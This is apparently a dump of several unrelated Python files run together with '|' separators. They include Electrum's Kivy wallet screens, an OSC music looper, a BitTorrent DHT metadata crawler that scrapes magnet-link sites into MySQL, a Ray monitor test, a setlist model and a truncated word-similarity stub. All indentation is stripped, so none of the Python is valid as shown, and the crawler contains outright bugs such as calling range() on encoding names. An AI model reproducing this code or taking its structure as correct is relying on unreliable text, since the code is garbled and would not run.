from electrum import simple_config
from electrum.lnaddr import lndecode, parse_lightning_invoice
from electrum.lnutil import RECEIVED, SENT, PaymentFailure
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
from electrum.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
Builder.load_file('electrum/gui/kivy/uix/ui_screens/history.kv')
Builder.load_file('electrum/gui/kivy/uix/ui_screens/send.kv')
Builder.load_file('electrum/gui/kivy/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = "atlas://electrum/gui/kivy/theming/light/lightning"
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = "atlas://electrum/gui/kivy/theming/light/" + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
payment_request_queued = None # type: Optional[str]
parsed_URI = None
def set_URI(self, text: str):
if not self.app.wallet:
self.payment_request_queued = text
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
if self.payment_request_queued:
self.set_URI(self.payment_request_queued)
self.payment_request_queued = None
_list = self.app.wallet.get_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list]
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item):
invoice_type = item['type']
status, status_str = get_request_status(item) # convert to str
if invoice_type == PR_TYPE_LN:
key = item['rhash']
log = self.app.wallet.lnworker.logs.get(key)
if item['status'] == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
elif invoice_type == PR_TYPE_ONCHAIN:
key = item['id']
else:
raise Exception('unknown invoice type')
return {
'is_lightning': invoice_type == PR_TYPE_LN,
'is_bip70': 'bip70' in item,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item['message'],
'amount': self.app.format_amount_and_units(item['amount'] or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Bitcoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
if self.is_lightning:
return parse_lightning_invoice(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Bitcoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(outputs, message, self.payment_request, self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self._do_pay_lightning(invoice)
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
do_pay = lambda rbf: self._do_pay_onchain(invoice, rbf)
if self.app.electrum_config.get('use_rbf'):
d = Question(_('Should this transaction be replaceable?'), do_pay)
d.open()
else:
do_pay(False)
else:
raise Exception('unknown invoice type')
def _do_pay_lightning(self, invoice):
attempts = 10
threading.Thread(target=self.app.wallet.lnworker.pay, args=(invoice['invoice'], invoice['amount'], attempts)).start()
def _do_pay_onchain(self, invoice, rbf):
# make unsigned transaction
outputs = invoice['outputs'] # type: List[PartialTxOutput]
amount = sum(map(lambda x: x.value, outputs))
coins = self.app.wallet.get_spendable_coins(None)
try:
tx = self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs)
except NotEnoughFunds:
self.app.show_error(_("Not enough funds"))
return
except Exception as e:
Logger.exception('')
self.app.show_error(repr(e))
return
if rbf:
tx.set_rbf(True)
fee = tx.get_fee()
msg = [
_("Amount to be sent") + ": " + self.app.format_amount_and_units(amount),
_("Mining fee") + ": " + self.app.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.app.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append(_("Additional fees") + ": " + self.app.format_amount_and_units(x_fee_amount))
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
msg.append(_("Enter your PIN code to proceed"))
self.app.protected('\n'.join(msg), self.send_tx, (tx,))
def send_tx(self, tx, password):
if self.app.wallet.has_password() and password is None:
return
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
def clear_invoices_dialog(self):
invoices = self.app.wallet.get_invoices()
if not invoices:
return
def callback(c):
if c:
for req in invoices:
key = req['key']
self.app.wallet.delete_invoice(key)
self.update()
n = len(invoices)
d = Question(_('Delete {} invoices?').format(n), callback)
d.open()
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.amount
if amount:
a, u = self.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.address, amount, self.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
if lightning:
key = self.app.wallet.lnworker.add_request(amount, message, self.expiry())
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req):
is_lightning = req.get('type') == PR_TYPE_LN
if not is_lightning:
address = req['address']
key = address
else:
key = req['rhash']
address = req['invoice']
amount = req.get('amount')
description = req.get('message') or req.get('memo', '') # TODO: a db upgrade would be needed to simplify that.
status, status_str = get_request_status(req)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_sorted_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
def clear_requests_dialog(self):
requests = self.app.wallet.get_sorted_requests()
if not requests:
return
def callback(c):
if c:
for req in requests:
key = req.get('rhash') or req['address']
self.app.wallet.delete_request(key)
self.update()
n = len(requests)
d = Question(_('Delete {} requests?').format(n), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
looper.py
|
"""A Looper mode for detecting and looping over a particular section."""
import OSC
import threading
import time
from Psc2.modes import mode
class Looper(mode.Mode):
"""A Looper Mode that can loop over a set of pre-defined sections.
It will start playback of the loop upon demand. The tempo can be set via
calls to set_tempo().
"""
def __init__(self,
client,
playback_notes,
eigths_per_tap=2,
eigth_duration = 0.5,
stop_midi_in=True):
"""Creates a Looper object.
Args:
client: OSCClient, used to send messages for playback.
playback_notes: list of list of tuples, tuples containing note pitches,
number of eigth notes until next onset, and note duration, defining a
part to be looped over.
eigths_per_tap: int, the number of eigth notes per tap for setting tempo.
stop_midi_in: bool, when True will stop receiving MIDI notes when looper
is active.
"""
self.client = client
self.repetitions_passed = 0
self.playback_notes = playback_notes
self.last_tap_onset = None
self.start_averaging = False
self.eigths_per_tap = eigths_per_tap
self.mistake_count = 0
self.cumulative_times = 0.
self.eigth_duration = eigth_duration
self.last_time = 0.
self.eigths_passed = 1
self.avg_velocity = 80.
self.playing = False
self.loop_num = 0
self.stop_midi_in = stop_midi_in
def start_looper_thread(self):
"""Start playing back the loop in a separate thread."""
def play_loop():
while True:
if self.loop_num >= len(self.playback_notes):
self.playing = False
self.terminate_loop = False
if self.stop_midi_in:
msg = OSC.OSCMessage()
msg.setAddress('/enablethru')
self.client.send(msg)
break
self.play()
if self.stop_midi_in:
msg = OSC.OSCMessage()
msg.setAddress('/disablethru')
self.client.send(msg)
self.playing = True
play_thread = threading.Thread(target = play_loop)
play_thread.start()
def set_tempo(self):
"""Set the tempo by tapping."""
if self.last_tap_onset is None:
self.last_tap_onset = time.time()
return
curr_time = time.time()
time_delta = curr_time - self.last_tap_onset
self.last_tap_onset = curr_time
if self.start_averaging:
self.eigth_duration += time_delta / self.eigths_per_tap
self.eigth_duration /= 2
else:
self.start_averaging = True
self.eigth_duration = time_delta / self.eigths_per_tap
def increment_loop(self):
self.loop_num += 1
def play(self):
"""Play the stored pattern in sequence.
Uses the average note duration and velocity for all notes.
"""
for note, next_onset, duration in self.playback_notes[self.loop_num]:
msg = OSC.OSCMessage()
msg.setAddress('/playthru')
msg.append([note, int(self.avg_velocity)])
self.client.send(msg)
time.sleep(duration * self.eigth_duration)
msgoff = OSC.OSCMessage()
msgoff.setAddress('/stopthru')
msgoff.append([note, int(self.avg_velocity)])
self.client.send(msgoff)
if next_onset > duration:
time.sleep((next_onset - duration) * self.eigth_duration)
def process_note(self, note, velocity):
"""This Mode doesn't do any incoming note processing."""
pass
def process_note_off(self, note, velocity):
"""This Mode doesn't do any incoming note processing."""
pass
|
tor-spider.py
|
import pymysql.cursors
from maga import Maga
from struct import pack,unpack
from time import sleep, time
import time
from queue import Queue
import asyncio
import threading
import socket
import signal
import requests
import json
import os
import base64
import bencoder
import math
from pybloom_live import ScalableBloomFilter, BloomFilter
from elasticsearch import Elasticsearch
from bs4 import BeautifulSoup as bs
es = Elasticsearch("localhost:9200")
connect = pymysql.Connect(
host='localhost',
port=3306,
user='guest',
passwd='xxx',
db='dht_spider',
charset='utf8')
cursor = connect.cursor()
BT_PROTOCOL = "BitTorrent protocol"
BT_MSG_ID = 20
EXT_HANDSHAKE = 0
infoQueue = Queue(maxsize=100000)
bloom = ScalableBloomFilter(initial_capacity=100, error_rate=0.001)
class Crawler(Maga):
def random_node_id(self,size):
return os.urandom(size)
def check_country(self,ip):
if ip:
try:
data = requests.get("https://sp0.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query="+ip+"&co=&resource_id=6006&t=1586779286008&ie=utf8&oe=gbk&cb=op_aladdin_callback&format=json&tn=baidu&cb=jQuery1102024254573672262314_1586779227570&_=1586779227662",timeout=5)
if data.status_code == 200:
content = str(data.content,encoding= "gbk")
if content.find('电信')+1 or content.find('联通')+1 or content.find('移动')+1 or content.find('香港')+1 or content.find('台湾')+1 or content.find('日本')+1 or content.find('韩国')+1:
print(content)
return True
return True
except Exception as e:
print(e)
return False
return False
async def handle_announce_peer(self,infohash,addr,peer_addr):
print(infohash)
'''
sql = "INSERT INTO torrent_info(infohash,addr) values('%s','%s','%s')"
data = (infohash,addr[0],addr[1])
cursor.execute(sql % data)
connect.commit()
'''
if True:#self.check_country(peer_addr[0]):
if infoQueue.qsize() <= 5000 and (infohash not in bloom):
print('bloom ok')
infoQueue.put((infohash,peer_addr))
bloom.add(infohash)
else:
pass
async def handle_get_peers(self,infohash,addr):
#print(infohash)
'''
sql = "INSERT INTO torrent_info(infohash,addr) values('%s','%s','%s')"
data = (infohash,addr[0],addr[1])
cursor.execute(sql % data)
connect.commit()
'''
#if self.check_country(addr[0]):
#infoQueue.put((infohash,addr[0]))
if True:#self.check_country(peer_addr[0]):
if infoQueue.qsize() <= 5000 and (infohash not in bloom):
print('bloom ok')
infoQueue.put((infohash,addr))
bloom.add(infohash)
else:
pass
def send_packet(self,_socket,msg):
if type(msg) == bytes:
_socket.send(msg)
else:
_socket.send(msg.encode())
packet = _socket.recv(4069)
return packet
def send_ext_message(self,_socket,msg):
msgLen = pack(">I",len(msg))
msg = msgLen+msg
packet = self.send_packet(_socket,msg)
return packet
def send_handshake(self,_socket,infohash):
bt_header = chr(len(BT_PROTOCOL)) + BT_PROTOCOL
bt_ext_byte = "\x00\x00\x00\x00\x00\x10\x00\x00"
peerId = self.random_node_id(20)
infohash = base64.b16decode(infohash)
msg = bt_header.encode() + bt_ext_byte.encode() + infohash + peerId
packet = self.send_packet(_socket,msg)
return packet
def check_handshake(self,packet,myHash):
print('check handshake')
try:
bt_header_len, packet = ord(packet[:1]), packet[1:]
if bt_header_len != len(BT_PROTOCOL):
print('header len error')
return False
except TypeError:
print('TypeError')
return False
bt_header, packet = packet[:bt_header_len], packet[bt_header_len:]
if not bt_header.decode() == BT_PROTOCOL:
print(bt_header)
print(BT_PROTOCOL.encode())
print('header error')
return False
packet = packet[8:]
infohash = packet[:20]
myHash = base64.b16decode(myHash)
if not infohash == myHash:
print(infohash)
print(myHash)
print('infohash uncorrent')
print(packet)
return False
return True
def send_ext_handshake(self,_socket):
msg = chr(BT_MSG_ID).encode() + chr(EXT_HANDSHAKE).encode() + bencoder.bencode({"m":{"ut_metadata":1}})
packet = self.send_ext_message(_socket,msg)
return packet
def request_metadata(self,_socket,extHandShakeId,piece):
msg = chr(BT_MSG_ID).encode() + chr(extHandShakeId).encode() + bencoder.bencode({"msg_type":0,"piece":piece})
packet = self.send_and_recv_all(_socket,msg)
return packet
def parse_ut_metadata(self,data):
metaData = "_metadata".encode()
index = data.find(metaData) + len(metaData) + 1
if index == -1:
return 2
return int(data[index])
def parse_metadata_size(self,packet):
_metadata_size = "metadata_size"
size_index = packet.index(_metadata_size.encode())+1
packet = packet[size_index:]
ut_metadata_size = packet[len(_metadata_size):packet.index('e1'.encode())]
#print(ut_metadata_size.decode())
return int(ut_metadata_size.decode())
def send_and_recv_all(self,_socket,msg,timeout = 5):
msgLen = pack(">I",len(msg))
msg = msgLen+msg
_socket.send(msg)
total = b''
while True:
try:
data = _socket.recv(1024)
if data:
total = total + data
except socket.timeout as e:
print(str(e))
break
return total
def decode(data):
result = ''
for x in range('utf-8','gbk','GB2312','ascii'):
try:
result = data.decode(x)
except Exception as e:
pass
return result
def download_metadata(self,timeout=10):
print('download-thread')
while True:
infohash,address = infoQueue.get()
sucess = self.request_magnet_page(infohash)
if sucess:
continue
else:
sucess2 = self.request_magnet_page_2(infohash)
if sucess2:
continue
continue
_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
metadata = b""
try:
_socket.settimeout(timeout)
_socket.connect((address[0],address[1]))
packet = self.send_handshake(_socket,infohash)
isCorrent = self.check_handshake(packet,infohash)
if not isCorrent:
print(packet)
print('Uncorrent Handshake')
continue
packet = self.send_ext_handshake(_socket)
ut_metadata = self.parse_ut_metadata(packet)
metadata_size = self.parse_metadata_size(packet)
for piece in range(int(math.ceil(metadata_size/(16*1024)))):
packet = self.request_metadata(_socket,2,piece)
index = packet.find('ee'.encode())
if index != -1:
packet = packet[index+2:]
metadata = metadata + packet
except Exception as e:
print('Error '+str(e)+' on :'+str(address[0])+":"+str(address[1]))
pass
finally:
_socket.close()
if metadata :
print('Done '+infohash)
info = self.parse_metadata(metadata)
if info:
name = info["name"]
self.save_metadata(infohash,name,address,str(info))
def parse_metadata(self, data): #解析种子
info = {}
self.encoding = 'utf8'
try:
torrent = bencoder.bdecode(data) #编码后解析
if not torrent.get(b'name'):
return None
except:
return None
detail = torrent
info['name'] = detail.get(b'name')
if b'files' in detail:
info['files'] = []
for x in detail[b'files']:
if b'path.utf-8' in x:
v = {'path': b'/'.join(x[b'path.utf-8']).decode('utf-8', 'ignore'), 'length': x[b'length']}
else:
v = {'path': b'/'.join(x[b'path']).decode('utf-8','ignore'), 'length': x[b'length']}
if b'filehash' in x:
v['filehash'] = base64.b16encode(x[b'filehash'])
info['files'].append(v)
info['length'] = sum([x['length'] for x in info['files']])
else:
info['length'] = detail[b'length']
info['data_hash'] = base64.b16encode(detail[b'pieces']) #hashlib.md5(detail[b'pieces']).hexdigest()
return info
def save_metadata(self,infohash,name,address,info):
sql = "insert into torrent_metadata(info_hash,address,name,info,magnet,update_time) values(%s,%s,%s,%s,%s,%s)"
magnet = 'magnet:?xt=urn:btih:' + infohash
updatetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
connect.ping(reconnect=True)
cursor.execute(sql,(infohash,address[0],name,info,magnet,updatetime))
connect.commit()
def request_magnet_page_2(self,infohash):
url = 'https://btman.pw/zh-cn/magnet/'
while True:
targetUrl = url+str(infohash)
try:
response = requests.get(targetUrl,timeout=7)
if response.status_code == 200:
html = response.text
soup = bs(html,'lxml')
name = soup.select('h2')[0].get_text()
print(name)
size = soup.select('.info-table td')[3].get_text()
count = 1
print(size)
magnet = 'magnet:?xt=urn:btih:'+infohash
updatetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
#data = {'name':name,'info_hash':infohash,'size':size,'magnet':magnet,'update_time':updatetime}
#es.index(index='torrent',doc_type='all_type',body=data,id=None)
torrentsql = 'insert into torrent_metadata(name,info_hash,size,magnet,update_time) value(%s,%s,%s,%s,%s)'
connect.ping(reconnect=True)
cursor.execute(torrentsql,(name,infohash,size,magnet,updatetime))
connect.commit()
print('Save :'+infohash)
return True
else:
print('Not found :'+infohash)
return False
except Exception as e:
print('Fail :'+str(e)+' in '+infohash)
print('Start Peer wire...')
return False
def request_magnet_page(self,infohash):
url = 'http://bq1.pw/magnet/'
while True:
targetUrl = url+str(infohash)
try:
response = requests.get(targetUrl,timeout=7)
if response.status_code == 200:
html = response.text
soup = bs(html,'lxml')
name = soup.select('h5')[0].get_text()
print(name)
size = soup.select('.att-c')[1].get_text()
count = soup.select('.att-c')[2].get_text()
print(size)
files = []
for path in soup.select('.striped .path'):
files.append(path.get_text())
print(files)
if len(files) >1:
files = '/'.join(files)
else:
files = files[0]
magnet = 'magnet:?xt=urn:btih:'+infohash
updatetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
#data = {'name':name,'info_hash':infohash,'size':size,'magnet':magnet,'paths':files,'update_time':updatetime}
#es.index(index='torrent',doc_type='metadata',body=data,id=None)
torrentsql = 'insert into torrent_metadata(name,info_hash,size,magnet,paths,update_time) value(%s,%s,%s,%s,%s,%s)'
connect.ping(reconnect=True)
cursor.execute(torrentsql,(name,infohash,size,magnet,files,updatetime))
connect.commit()
print('Save :'+infohash)
return True
else:
print('Not found :'+infohash)
return False
except Exception as e:
print('Fail :'+str(e)+' in '+infohash)
print('Start Peer wire...')
return False
def run(self, port=6881):
coro = self.loop.create_datagram_endpoint(
lambda: self, local_addr=('0.0.0.0', port)
)
transport, _ = self.loop.run_until_complete(coro)
for signame in ('SIGINT', 'SIGTERM'):
try:
self.loop.add_signal_handler(getattr(signal, signame), self.stop)
except NotImplementedError:
# SIGINT and SIGTERM are not implemented on windows
pass
for i in range(20):
threading.Thread(target=self.download_metadata).start()
for node in self.bootstrap_nodes:
# Bootstrap
self.find_node(addr=node, node_id=self.node_id)
asyncio.ensure_future(self.auto_find_nodes(), loop=self.loop)
self.loop.run_forever()
self.loop.close()
crawler = Crawler()
crawler.run(6881)
|
monitor_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import subprocess
import time
import unittest
import ray
class MonitorTest(unittest.TestCase):
def _testCleanupOnDriverExit(self, num_redis_shards):
stdout = subprocess.check_output([
"ray",
"start",
"--head",
"--num-redis-shards",
str(num_redis_shards),
]).decode("ascii")
lines = [m.strip() for m in stdout.split("\n")]
init_cmd = [m for m in lines if m.startswith("ray.init")]
self.assertEqual(1, len(init_cmd))
redis_address = init_cmd[0].split("redis_address=\"")[-1][:-2]
def StateSummary():
obj_tbl_len = len(ray.global_state.object_table())
task_tbl_len = len(ray.global_state.task_table())
func_tbl_len = len(ray.global_state.function_table())
return obj_tbl_len, task_tbl_len, func_tbl_len
def Driver(success):
success.value = True
# Start driver.
ray.init(redis_address=redis_address)
summary_start = StateSummary()
if (0, 1) != summary_start[:2]:
success.value = False
# Two new objects.
ray.get(ray.put(1111))
ray.get(ray.put(1111))
if (2, 1, summary_start[2]) != StateSummary():
success.value = False
@ray.remote
def f():
ray.put(1111) # Yet another object.
return 1111 # A returned object as well.
# 1 new function.
if (2, 1, summary_start[2] + 1) != StateSummary():
success.value = False
ray.get(f.remote())
if (4, 2, summary_start[2] + 1) != StateSummary():
success.value = False
ray.worker.cleanup()
success = multiprocessing.Value('b', False)
driver = multiprocessing.Process(target=Driver, args=(success, ))
driver.start()
# Wait for client to exit.
driver.join()
time.sleep(5)
# Just make sure Driver() is run and succeeded. Note(rkn), if the below
# assertion starts failing, then the issue may be that the summary
# values computed in the Driver function are being updated slowly and
# so the call to StateSummary() is getting outdated values. This could
# be fixed by looping until StateSummary() returns the desired values.
self.assertTrue(success.value)
# Check that objects, tasks, and functions are cleaned up.
ray.init(redis_address=redis_address)
# The assertion below can fail if the monitor is too slow to clean up
# the global state.
self.assertEqual((0, 1), StateSummary()[:2])
ray.worker.cleanup()
subprocess.Popen(["ray", "stop"]).wait()
def testCleanupOnDriverExitSingleRedisShard(self):
self._testCleanupOnDriverExit(num_redis_shards=1)
def testCleanupOnDriverExitManyRedisShards(self):
self._testCleanupOnDriverExit(num_redis_shards=5)
self._testCleanupOnDriverExit(num_redis_shards=31)
if __name__ == "__main__":
unittest.main(verbosity=2)
|
setlist.py
|
from concurrent.futures import ThreadPoolExecutor
from threading import Thread
from typing import Any, Iterable
from pydantic import BaseModel
from playbacker.audiofile import AudioFile
from playbacker.song import Song
class Setlist(BaseModel):
name: str
songs: list[Song]
preloaded: bool = False
def _collect_audiofiles(self) -> Iterable[AudioFile]:
for song in self.songs:
if song.tracks.multitrack:
yield song.tracks.multitrack
if song.tracks.guide:
yield song.tracks.guide
def _preload_songs_in_pool(self) -> None:
def func(audiofile: AudioFile):
def inner():
audiofile.data
return inner
with ThreadPoolExecutor(5) as pool:
for audiofile in self._collect_audiofiles():
pool.submit(func(audiofile))
self.preloaded = True
def preload_songs(self) -> None:
Thread(target=self._preload_songs_in_pool, daemon=True).start()
def _get_song_idx(self, song: Song) -> int:
try:
return self.songs.index(song)
except ValueError:
return -1
def previous(self, song: Song) -> Song | None:
idx = self._get_song_idx(song)
return self.songs[idx - 1]
def next(self, song: Song) -> Song:
idx = self._get_song_idx(song)
try:
return self.songs[idx + 1]
except IndexError:
return self.songs[0]
def _find_song_in_storage(name: str, storage: list[Song]):
for song in storage:
if song.name == name:
return song
raise RuntimeError(f'Song "{name}" is not present in storage')
class _FileSetlist(BaseModel):
__root__: list[str]
def load_setlist(name: str, content: Any, songs: list[Song]) -> Setlist:
fsetlist = _FileSetlist(__root__=content)
selected_songs = [_find_song_in_storage(n, songs) for n in fsetlist.__root__]
return Setlist(name=name, songs=selected_songs)
|
wordSimilarity.py
|
import urllib.request
import sys
import json
import math
from urllib.parse import quote
from threading import Thread
class WordSimilarity:
scoreDictionary = {}
scoreDictionary['esa'] = 0
